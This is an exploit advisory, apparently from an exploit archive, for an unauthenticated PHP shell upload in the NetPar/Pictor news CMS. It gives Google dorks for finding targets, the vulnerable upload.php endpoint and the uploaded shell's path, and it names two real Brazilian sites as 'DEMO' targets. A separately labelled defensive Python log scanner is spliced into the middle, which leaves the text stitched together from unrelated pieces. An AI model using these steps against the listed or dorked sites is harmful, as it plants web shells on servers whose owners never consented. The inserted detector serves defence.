
NetPar & Pictor Shell Upload Vulnerability

Author: bRpsd , Published: 25-06-2015
########################################################
[+] Title => NetPar & Pictor Shell Upload Vulnerability

[+] Date => 26 June 2015

[+] Author => bRpsd
Skype => vegnox
eMail => cy@live.no


[+] Software Homepage => http://netpar.com.br/

[+] Google Dorks =>
Dork1: intext:Hospedado na NETPAR inurl:index.php?pag=

Dork2: intext:Produzido pela PICTOR Hospedado na NETPAR

########################################################

Infected File: http://localhost/noticias/admin/upload.php
Problem (bug) : Does not require admin cookies or login
Problem2 (bug): No protection against uploading a file with PHP extension


Exploit: {Shell Upload } , Upload as (shell.php) No bypass required!

http://localhost/noticias/admin/upload.php?pag=admin&sub=

Shell Path (Location) :

http://localhost/noticias/admin/fotos/SHELL HERE .php

# The shell will be a numeric value, w0w .. so secured! (:
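
A detection check for the two problems above, added here as an example and not part of the original advisory: it scans web access logs for accepted POSTs to the upload script and for PHP files served from the fotos/ directory. The log lines are constructed samples in combined log format, and the function and finding names are assumptions.

```python
import re

# Apache/nginx combined log format: ip ident user [ts] "METHOD path PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
# Both paths come from the advisory: the upload script and its fotos/ directory.
UPLOAD_RE = re.compile(r'/noticias/admin/upload\.php(?:\?|$)', re.I)
SCRIPT_RE = re.compile(
    r'/noticias/admin/fotos/[^/?]+\.(?:php\d?|phtml|phar)(?:\?|$)', re.I
)

def scan(lines):
    """Return (ip, kind, path) findings in log order."""
    findings, uploaders = [], set()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # ignore lines that are not in the expected format
        ip, method, path, status = m.group("ip", "method", "path", "status")
        if method == "POST" and UPLOAD_RE.search(path) and status[0] in "23":
            # The script has no login check, so every accepted POST needs review.
            uploaders.add(ip)
            findings.append((ip, "upload-post", path))
        elif SCRIPT_RE.search(path) and status == "200":
            # An image directory should never serve a PHP script successfully.
            kind = "script-after-upload" if ip in uploaders else "script-served"
            findings.append((ip, kind, path))
    return findings

# Constructed sample lines (documentation IP ranges), not taken from a real server.
SAMPLE = [
    '203.0.113.7 - - [26/Jun/2015:10:00:01 +0000] "POST /noticias/admin/upload.php?pag=admin&sub= HTTP/1.1" 200 512 "-" "-"',
    '203.0.113.7 - - [26/Jun/2015:10:00:05 +0000] "GET /noticias/admin/fotos/1435312801.php HTTP/1.1" 200 87 "-" "-"',
    '198.51.100.4 - - [26/Jun/2015:10:02:00 +0000] "GET /noticias/admin/fotos/1435300000.jpg HTTP/1.1" 200 20480 "-" "-"',
    '192.0.2.9 - - [26/Jun/2015:10:03:00 +0000] "GET /noticias/admin/fotos/77.php HTTP/1.1" 404 0 "-" "-"',
    '192.0.2.50 - - [26/Jun/2015:10:04:00 +0000] "GET /noticias/admin/fotos/1435312801.php HTTP/1.1" 200 87 "-" "-"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(*finding)
```

Any "script-served" or "script-after-upload" finding means a PHP file in fotos/ was executed and the directory contents should be reviewed.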

DEMO (For Testing):

http://www.hwc.com.br/noticias/admin/upload.php?pag=admin&sub=

http://www.goncalvesmarcasepatentes.com.br/noticias/admin/upload.php?pag=admin&sub=




Ramadan Mubarak!



Enjoy ! , Aurevoir! <3
